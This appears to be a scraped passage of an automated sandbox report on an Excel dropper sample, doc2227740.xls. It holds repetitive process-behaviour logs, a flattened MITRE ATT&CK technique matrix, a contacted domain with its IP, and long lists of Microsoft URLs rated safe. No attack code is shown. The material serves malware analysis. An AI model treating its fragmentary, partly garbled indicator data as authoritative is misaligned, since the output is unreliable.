    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: Yara matchFile source: doc2227740.xls, type: SAMPLE
    Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb VolumeInformationJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformationJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformationJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb VolumeInformationJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformationJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformationJump to behavior

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting11DLL Side-Loading1Process Injection1Masquerading1OS Credential DumpingFile and Directory Discovery2Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution3Boot or Logon Initialization ScriptsDLL Side-Loading1Process Injection1LSASS MemorySystem Information Discovery11Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Scripting11Security Account ManagerRemote System Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)DLL Side-Loading1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    doc2227740.xls21%ReversingLabsDocument-Excel.Dropper.SDrop

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    sherpa.rest0%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
    https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://powerlift-user.acompli.net0%URL Reputationsafe
    https://powerlift-user.acompli.net0%URL Reputationsafe
    https://powerlift-user.acompli.net0%URL Reputationsafe
    https://powerlift-user.acompli.net0%URL Reputationsafe
    https://officeci.azurewebsites.net/api/0%VirustotalBrowse
    https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://asgsmsproxyapi.azurewebsites.net/0%VirustotalBrowse
    https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    sherpa.rest
    104.27.172.15
    truefalseunknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://api.diagnosticssdf.office.com617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
      high
      https://login.microsoftonline.com/617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
        high
        https://shell.suite.office.com:1443617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
          high
          https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
            high
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
              high
              https://cdn.entity.617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/query617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                high
                https://wus2-000.contentsync.617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                https://clients.config.office.net/user/v1.0/tenantassociationkey617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                    high
                    https://powerlift.acompli.net617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.com617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v1617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                      high
                      https://cortana.ai617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspx617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.com617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                high
                                https://api.aadrm.com/617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                      high
                                      https://cr.office.com617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                        high
                                        https://portal.office.com/account/?ref=ClientMeControl617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                          high
                                          https://ecs.office.com/config/v2/Office617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                            high
                                            https://graph.ppe.windows.net617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                              high
                                              https://res.getmicrosoftkey.com/api/redemptionevents617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://powerlift-user.acompli.net617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
